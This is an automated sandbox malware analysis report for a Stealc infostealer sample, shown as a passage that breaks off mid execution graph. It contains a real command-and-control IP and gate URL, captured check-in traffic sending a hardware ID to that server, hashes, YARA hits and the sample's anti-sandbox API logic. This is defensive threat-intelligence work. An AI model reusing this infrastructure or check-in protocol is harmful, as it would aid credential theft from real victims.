                      http://185.215.113.206/wsfile.exe, 00000000.00000002.2264756747.0000000000D67000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://185.215.113.206/c4becf79229cb002.phpwfile.exe, 00000000.00000002.2264756747.0000000000D67000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://185.215.113.206/c4becf79229cb002.phpHfile.exe, 00000000.00000002.2264756747.0000000000D83000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://185.215.113.206/c4becf79229cb002.phptopfile.exe, 00000000.00000002.2264756747.0000000000D67000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            185.215.113.206
                            		unknownPortugal
                            		206894WHOLESALECONNECTIONSNLtrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1562275
                            Start date and time:2024-11-25 12:57:13 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 5m 2s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:14
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 79%
                            • Number of executed functions: 19
                            • Number of non-executed functions: 122
                            Cookbook Comments:
                            • Found application associated with file extension: .exe

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                            • Excluded IPs from analysis (whitelisted): 20.198.118.190
                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, wns.notify.trafficmanager.net, otelrules.azureedge.net, slscr.update.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: file.exe

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            185.215.113.206file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206/
                            file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206/c4becf79229cb002.php

                            Domains

                            No context

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                            • 185.215.113.206
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206
                            file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                            • 185.215.113.206
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206
                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                            • 185.215.113.206
                            file.exeGet hashmaliciousLummaC StealerBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.944055505969845
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'773'568 bytes
                            MD5:754418530dca8e93cba3a5a7f409f441
                            SHA1:b847b0861f4e1d1d309c0bdf51f02fb8954663f7
                            SHA256:0d025b505282376cd436001c8148e720475463ac9c266bf3788689f93147a178
                            SHA512:f833a2f6477443f23928194b305d88089c5ed15854b18e9664c211b46446cfc0a9b33ffb4726fb2b91a537455bc079c6028c369bf6aba9ce38ee3ed6ff7ca859
                            SSDEEP:49152:AsCLPrDVudJV4/EUB6Pm+T1AseltjYlxdAN:hC7rDgJa/EUq31Olt83dA
                            TLSH:7C85335084D687E8D10E693A68372ACEB3F0E8E225F412E5BF5C4AFD6553064D8F72E4
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

                            File Icon

                            Icon Hash:00928e8e8686b000

                            Static PE Info

                            General

                            Entrypoint:0xa84000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                            Entrypoint Preview

                            Instruction
                            jmp 00007FD7F912353Ah
                            pmaxsw mm3, qword ptr [edx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add cl, ch
                            add byte ptr [eax], ah
                            add byte ptr [eax], al
                            add byte ptr [ebx], al
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], dh
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax+eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            and al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            push es
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            or ecx, dword ptr [edx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            aas
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [edx], ah
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add ecx, dword ptr [edx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add cl, byte ptr [edx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [eax+00000000h], eax
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add cl, byte ptr [edx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add eax, 0000000Ah
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al

                            Rich Headers

                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x2b0.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            0x10000x2490000x162006de42760512711bbb87411ce1ff7591eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc0x24a0000x2b00x20089a3dac65d243a9ca3df1193403689baFalse0.794921875data6.050181618362197IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            0x24c0000x29f0000x2005ad228d735815b19a90501b764116783unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            mipucltu0x4eb0000x1980000x197200ae12f35653889be0294e34e00d13afb4False0.994617362603623data7.95313555425277IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            sqflgmcm0x6830000x10000x400e058fee004ac3cf662e2fe61e85238aaFalse0.76171875data6.010065609269607IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .taggant0x6840000x30000x2200d20c06754105585ea65dee0f0ee2c13fFalse0.06767003676470588DOS executable (COM)0.7861989387174687IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                            Resources

                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_MANIFEST0x681e6c0x256ASCII text, with CRLF line terminators0.5100334448160535

                            Imports

                            DLLImport
                            kernel32.dlllstrcpy

                            Network Behavior

                            Suricata IDS Alerts

                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-11-25T12:58:18.417120+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.649722185.215.113.20680TCP

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Nov 25, 2024 12:58:16.246881962 CET4972280192.168.2.6185.215.113.206
                            Nov 25, 2024 12:58:16.366736889 CET8049722185.215.113.206192.168.2.6
                            Nov 25, 2024 12:58:16.366908073 CET4972280192.168.2.6185.215.113.206
                            Nov 25, 2024 12:58:16.368027925 CET4972280192.168.2.6185.215.113.206
                            Nov 25, 2024 12:58:16.487584114 CET8049722185.215.113.206192.168.2.6
                            Nov 25, 2024 12:58:17.831347942 CET8049722185.215.113.206192.168.2.6
                            Nov 25, 2024 12:58:17.831389904 CET4972280192.168.2.6185.215.113.206
                            Nov 25, 2024 12:58:17.839416027 CET4972280192.168.2.6185.215.113.206
                            Nov 25, 2024 12:58:17.958971024 CET8049722185.215.113.206192.168.2.6
                            Nov 25, 2024 12:58:18.417012930 CET8049722185.215.113.206192.168.2.6
                            Nov 25, 2024 12:58:18.417119980 CET4972280192.168.2.6185.215.113.206
                            Nov 25, 2024 12:58:23.305932045 CET8049722185.215.113.206192.168.2.6
                            Nov 25, 2024 12:58:23.306014061 CET4972280192.168.2.6185.215.113.206
                            Nov 25, 2024 12:58:23.822283030 CET4972280192.168.2.6185.215.113.206

                            HTTP Request Dependency Graph

                            • 185.215.113.206

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.649722185.215.113.206801488C:\Users\user\Desktop\file.exe
                            TimestampBytes transferredDirectionData
                            Nov 25, 2024 12:58:16.368027925 CET90OUTGET / HTTP/1.1
                            Host: 185.215.113.206
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Nov 25, 2024 12:58:17.831347942 CET203INHTTP/1.1 200 OK
                            Date: Mon, 25 Nov 2024 11:58:17 GMT
                            Server: Apache/2.4.41 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Nov 25, 2024 12:58:17.839416027 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----GIIEGHIDBGHIECAAECGD
                            Host: 185.215.113.206
                            Content-Length: 211
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Data Raw: 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 30 46 39 31 46 35 43 46 33 36 33 38 34 38 34 36 38 37 36 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 2d 2d 0d 0a
                            Data Ascii: ------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="hwid"620F91F5CF363848468766------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="build"mars------GIIEGHIDBGHIECAAECGD--
                            Nov 25, 2024 12:58:18.417012930 CET210INHTTP/1.1 200 OK
                            Date: Mon, 25 Nov 2024 11:58:18 GMT
                            Server: Apache/2.4.41 (Ubuntu)
                            Content-Length: 8
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 59 6d 78 76 59 32 73 3d
                            Data Ascii: YmxvY2s=


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            System Behavior

                            General

                            Target ID:0
                            Start time:06:58:11
                            Start date:25/11/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0xe30000
                            File size:1'773'568 bytes
                            MD5 hash:754418530DCA8E93CBA3A5A7F409F441
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2177796637.0000000005080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2264756747.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:5%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:16.4%
                              Total number of Nodes:1408
                              Total number of Limit Nodes:28
                              execution_graph 27605 e52d60 11 API calls 27626 e52b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 27627 e5a280 __CxxFrameHandler 27590 e35869 57 API calls 27614 e41269 408 API calls 27591 e44c77 296 API calls 26141 e51bf0 26193 e32a90 26141->26193 26145 e51c03 26146 e51c29 lstrcpy 26145->26146 26147 e51c35 26145->26147 26146->26147 26148 e51c65 ExitProcess 26147->26148 26149 e51c6d GetSystemInfo 26147->26149 26150 e51c85 26149->26150 26151 e51c7d ExitProcess 26149->26151 26294 e31030 GetCurrentProcess VirtualAllocExNuma 26150->26294 26156 e51ca2 26157 e51cb8 26156->26157 26159 e51cb0 ExitProcess 26156->26159 26306 e52ad0 GetProcessHeap RtlAllocateHeap GetComputerNameA 26157->26306 26160 e51ce7 lstrlen 26166 e51cff 26160->26166 26161 e51cbd 26161->26160 26515 e52a40 GetProcessHeap RtlAllocateHeap GetUserNameA 26161->26515 26163 e51cd1 26163->26160 26168 e51ce0 ExitProcess 26163->26168 26164 e51d23 lstrlen 26165 e51d39 26164->26165 26169 e51d5a 26165->26169 26170 e51d46 lstrcpy lstrcat 26165->26170 26166->26164 26167 e51d13 lstrcpy lstrcat 26166->26167 26167->26164 26171 e52ad0 3 API calls 26169->26171 26170->26169 26172 e51d5f lstrlen 26171->26172 26174 e51d74 26172->26174 26173 e51d9a lstrlen 26175 e51db0 26173->26175 26174->26173 26176 e51d87 lstrcpy lstrcat 26174->26176 26177 e51dce 26175->26177 26178 e51dba lstrcpy lstrcat 26175->26178 26176->26173 26308 e52a40 GetProcessHeap RtlAllocateHeap GetUserNameA 26177->26308 26178->26177 26180 e51dd3 lstrlen 26181 e51de7 26180->26181 26182 e51df7 lstrcpy lstrcat 26181->26182 26183 e51e0a 26181->26183 26182->26183 26184 e51e28 lstrcpy 26183->26184 26185 e51e30 26183->26185 26184->26185 26186 e51e56 OpenEventA 26185->26186 26187 e51e8c CreateEventA 26186->26187 26188 e51e68 CloseHandle Sleep OpenEventA 26186->26188 26309 e51b20 GetSystemTime 26187->26309 26188->26187 26188->26188 26192 e51ea5 CloseHandle ExitProcess 26516 e34a60 26193->26516 26195 e32aa1 26196 e34a60 2 API calls 26195->26196 26197 e32ab7 26196->26197 26198 e34a60 2 API calls 26197->26198 26199 e32acd 26198->26199 26200 e34a60 2 API calls 26199->26200 26201 e32ae3 26200->26201 26202 e34a60 2 API calls 26201->26202 26203 e32af9 26202->26203 26204 e34a60 2 API calls 26203->26204 26205 e32b0f 26204->26205 26206 e34a60 2 API calls 26205->26206 26207 e32b28 26206->26207 26208 e34a60 2 API calls 26207->26208 26209 e32b3e 26208->26209 26210 e34a60 2 API calls 26209->26210 26211 e32b54 26210->26211 26212 e34a60 2 API calls 26211->26212 26213 e32b6a 26212->26213 26214 e34a60 2 API calls 26213->26214 26215 e32b80 26214->26215 26216 e34a60 2 API calls 26215->26216 26217 e32b96 26216->26217 26218 e34a60 2 API calls 26217->26218 26219 e32baf 26218->26219 26220 e34a60 2 API calls 26219->26220 26221 e32bc5 26220->26221 26222 e34a60 2 API calls 26221->26222 26223 e32bdb 26222->26223 26224 e34a60 2 API calls 26223->26224 26225 e32bf1 26224->26225 26226 e34a60 2 API calls 26225->26226 26227 e32c07 26226->26227 26228 e34a60 2 API calls 26227->26228 26229 e32c1d 26228->26229 26230 e34a60 2 API calls 26229->26230 26231 e32c36 26230->26231 26232 e34a60 2 API calls 26231->26232 26233 e32c4c 26232->26233 26234 e34a60 2 API calls 26233->26234 26235 e32c62 26234->26235 26236 e34a60 2 API calls 26235->26236 26237 e32c78 26236->26237 26238 e34a60 2 API calls 26237->26238 26239 e32c8e 26238->26239 26240 e34a60 2 API calls 26239->26240 26241 e32ca4 26240->26241 26242 e34a60 2 API calls 26241->26242 26243 e32cbd 26242->26243 26244 e34a60 2 API calls 26243->26244 26245 e32cd3 26244->26245 26246 e34a60 2 API calls 26245->26246 26247 e32ce9 26246->26247 26248 e34a60 2 API calls 26247->26248 26249 e32cff 26248->26249 26250 e34a60 2 API calls 26249->26250 26251 e32d15 26250->26251 26252 e34a60 2 API calls 26251->26252 26253 e32d2b 26252->26253 26254 e34a60 2 API calls 26253->26254 26255 e32d44 26254->26255 26256 e34a60 2 API calls 26255->26256 26257 e32d5a 26256->26257 26258 e34a60 2 API calls 26257->26258 26259 e32d70 26258->26259 26260 e34a60 2 API calls 26259->26260 26261 e32d86 26260->26261 26262 e34a60 2 API calls 26261->26262 26263 e32d9c 26262->26263 26264 e34a60 2 API calls 26263->26264 26265 e32db2 26264->26265 26266 e34a60 2 API calls 26265->26266 26267 e32dcb 26266->26267 26268 e34a60 2 API calls 26267->26268 26269 e32de1 26268->26269 26270 e34a60 2 API calls 26269->26270 26271 e32df7 26270->26271 26272 e34a60 2 API calls 26271->26272 26273 e32e0d 26272->26273 26274 e34a60 2 API calls 26273->26274 26275 e32e23 26274->26275 26276 e34a60 2 API calls 26275->26276 26277 e32e39 26276->26277 26278 e34a60 2 API calls 26277->26278 26279 e32e52 26278->26279 26280 e56390 GetPEB 26279->26280 26281 e565c3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 26280->26281 26286 e563c3 26280->26286 26282 e56625 GetProcAddress 26281->26282 26283 e56638 26281->26283 26282->26283 26284 e56641 GetProcAddress GetProcAddress 26283->26284 26285 e5666c 26283->26285 26284->26285 26287 e56675 GetProcAddress 26285->26287 26288 e56688 26285->26288 26291 e563d7 20 API calls 26286->26291 26287->26288 26289 e566a4 26288->26289 26290 e56691 GetProcAddress 26288->26290 26292 e566d7 26289->26292 26293 e566ad GetProcAddress GetProcAddress 26289->26293 26290->26289 26291->26281 26292->26145 26293->26292 26295 e31057 ExitProcess 26294->26295 26296 e3105e VirtualAlloc 26294->26296 26297 e3107d 26296->26297 26298 e310b1 26297->26298 26299 e3108a VirtualFree 26297->26299 26300 e310c0 26298->26300 26299->26298 26301 e310d0 GlobalMemoryStatusEx 26300->26301 26303 e31112 ExitProcess 26301->26303 26304 e310f5 26301->26304 26304->26303 26305 e3111a GetUserDefaultLangID 26304->26305 26305->26156 26305->26157 26307 e52b24 26306->26307 26307->26161 26308->26180 26521 e51820 26309->26521 26311 e51b81 sscanf 26560 e32a20 26311->26560 26314 e51be9 26317 e4ffd0 26314->26317 26315 e51be2 ExitProcess 26316 e51bd6 26316->26314 26316->26315 26318 e4ffe0 26317->26318 26319 e5000d lstrcpy 26318->26319 26320 e50019 lstrlen 26318->26320 26319->26320 26321 e500d0 26320->26321 26322 e500e7 lstrlen 26321->26322 26323 e500db lstrcpy 26321->26323 26324 e500ff 26322->26324 26323->26322 26325 e50116 lstrlen 26324->26325 26326 e5010a lstrcpy 26324->26326 26327 e5012e 26325->26327 26326->26325 26328 e50145 26327->26328 26329 e50139 lstrcpy 26327->26329 26562 e51570 26328->26562 26329->26328 26332 e5016e 26333 e50183 lstrcpy 26332->26333 26334 e5018f lstrlen 26332->26334 26333->26334 26335 e501a8 26334->26335 26336 e501bd lstrcpy 26335->26336 26337 e501c9 lstrlen 26335->26337 26336->26337 26338 e501e8 26337->26338 26339 e50200 lstrcpy 26338->26339 26340 e5020c lstrlen 26338->26340 26339->26340 26341 e5026a 26340->26341 26342 e50282 lstrcpy 26341->26342 26343 e5028e 26341->26343 26342->26343 26572 e32e70 26343->26572 26351 e50540 26352 e51570 4 API calls 26351->26352 26353 e5054f 26352->26353 26354 e505a1 lstrlen 26353->26354 26355 e50599 lstrcpy 26353->26355 26356 e505bf 26354->26356 26355->26354 26357 e505d1 lstrcpy lstrcat 26356->26357 26358 e505e9 26356->26358 26357->26358 26359 e50614 26358->26359 26360 e5060c lstrcpy 26358->26360 26361 e5061b lstrlen 26359->26361 26360->26359 26362 e50636 26361->26362 26363 e5064a lstrcpy lstrcat 26362->26363 26364 e50662 26362->26364 26363->26364 26365 e50687 26364->26365 26366 e5067f lstrcpy 26364->26366 26367 e5068e lstrlen 26365->26367 26366->26365 26368 e506b3 26367->26368 26369 e506c7 lstrcpy lstrcat 26368->26369 26370 e506db 26368->26370 26369->26370 26371 e50704 lstrcpy 26370->26371 26372 e5070c 26370->26372 26371->26372 26373 e50751 26372->26373 26374 e50749 lstrcpy 26372->26374 27328 e52740 GetWindowsDirectoryA 26373->27328 26374->26373 26376 e50785 27337 e34c50 26376->27337 26377 e5075d 26377->26376 26378 e5077d lstrcpy 26377->26378 26378->26376 26380 e5078f 27491 e48ca0 StrCmpCA 26380->27491 26382 e5079b 26383 e31530 8 API calls 26382->26383 26384 e507bc 26383->26384 26385 e507e5 lstrcpy 26384->26385 26386 e507ed 26384->26386 26385->26386 27509 e360d0 80 API calls 26386->27509 26388 e507fa 27510 e481b0 10 API calls 26388->27510 26390 e50809 26391 e31530 8 API calls 26390->26391 26392 e5082f 26391->26392 26393 e50856 lstrcpy 26392->26393 26394 e5085e 26392->26394 26393->26394 27511 e360d0 80 API calls 26394->27511 26396 e5086b 27512 e47ee0 lstrlen lstrcpy StrCmpCA StrCmpCA StrCmpCA 26396->27512 26398 e50876 26399 e31530 8 API calls 26398->26399 26400 e508a1 26399->26400 26401 e508d5 26400->26401 26402 e508c9 lstrcpy 26400->26402 27513 e360d0 80 API calls 26401->27513 26402->26401 26404 e508db 27514 e48050 lstrlen lstrcpy StrCmpCA lstrlen lstrcpy 26404->27514 26406 e508e6 26407 e31530 8 API calls 26406->26407 26408 e508f7 26407->26408 26409 e50926 lstrcpy 26408->26409 26410 e5092e 26408->26410 26409->26410 27515 e35640 8 API calls 26410->27515 26412 e50933 26413 e31530 8 API calls 26412->26413 26414 e5094c 26413->26414 27516 e47280 1501 API calls 26414->27516 26416 e5099f 26417 e31530 8 API calls 26416->26417 26418 e509cf 26417->26418 26419 e509f6 lstrcpy 26418->26419 26420 e509fe 26418->26420 26419->26420 27517 e360d0 80 API calls 26420->27517 26422 e50a0b 27518 e483e0 7 API calls 26422->27518 26424 e50a18 26425 e31530 8 API calls 26424->26425 26426 e50a29 26425->26426 27519 e324e0 230 API calls 26426->27519 26428 e50a6b 26429 e50b40 26428->26429 26430 e50a7f 26428->26430 26432 e31530 8 API calls 26429->26432 26431 e31530 8 API calls 26430->26431 26433 e50aa5 26431->26433 26434 e50b59 26432->26434 26436 e50ad4 26433->26436 26437 e50acc lstrcpy 26433->26437 26435 e50b87 26434->26435 26438 e50b7f lstrcpy 26434->26438 27523 e360d0 80 API calls 26435->27523 27520 e360d0 80 API calls 26436->27520 26437->26436 26438->26435 26441 e50b8d 27524 e4c840 70 API calls 26441->27524 26442 e50ada 27521 e485b0 47 API calls 26442->27521 26445 e50b38 26448 e50bd1 26445->26448 26450 e31530 8 API calls 26445->26450 26446 e50ae5 26447 e31530 8 API calls 26446->26447 26449 e50af6 26447->26449 26451 e50bfa 26448->26451 26455 e31530 8 API calls 26448->26455 27522 e4d0f0 118 API calls 26449->27522 26454 